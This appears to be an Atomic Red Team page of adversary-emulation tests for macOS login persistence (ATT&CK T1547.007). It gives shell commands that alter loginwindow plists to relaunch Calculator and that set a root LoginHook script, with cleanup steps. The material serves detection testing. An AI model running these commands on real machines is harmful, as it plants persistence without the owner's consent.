Skip to content
Atomic Red Team
atomics
T1547.007

T1547.007 - Boot or Logon Autostart Execution: Re-opened Applications

Description from ATT&CK (opens in a new tab)

Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish Persistence (opens in a new tab) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.

Atomic Tests


Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications

Copy in new loginwindow.plist to launch Calculator.

Supported Platforms: macOS

auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba

Inputs:

NameDescriptionTypeDefault Value
calc_plist_pathpath to binary plist with entry to open calculatorpathPathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist

Attack Commands: Run with sh!

cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist

Cleanup Commands:

rm -f ~/Library/Preferences/ByHost/com.apple.loginwindow.plist


Atomic Test #2 - Re-Opened Applications using LoginHook

Mac Defaults

Reference (opens in a new tab)

Supported Platforms: macOS

auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb

Inputs:

NameDescriptionTypeDefault Value
scriptpath to scriptpath/path/to/script

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo defaults write com.apple.loginwindow LoginHook #{script}

Cleanup Commands:

sudo defaults delete com.apple.loginwindow LoginHook


Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications

Appends an entry to launch Calculator hidden loginwindow.*.plist for next login. Note that the change may not result in the added Calculator program launching on next user login. It may depend on which version of macOS you are running on.

Supported Platforms: macOS

auto_generated_guid: 766b6c3c-9353-4033-8b7e-38b309fa3a93

Inputs:

NameDescriptionTypeDefault Value
objc_source_pathpath to objective C programpathPathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m
exe_pathpath to compiled programpath/tmp/t1547007_append_exe

Attack Commands: Run with sh!

FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}

Cleanup Commands:

rm -f #{exe_path}
# revert to backup copy
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then
   exit 0
fi
mv /tmp/t1547007_loginwindow-backup.plist ${FILE}

Dependencies: Run with bash!

Description: compile C program
Check Prereq Commands:
if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi
Get Prereq Commands:
cc #{objc_source_path} -o #{exe_path} -framework Cocoa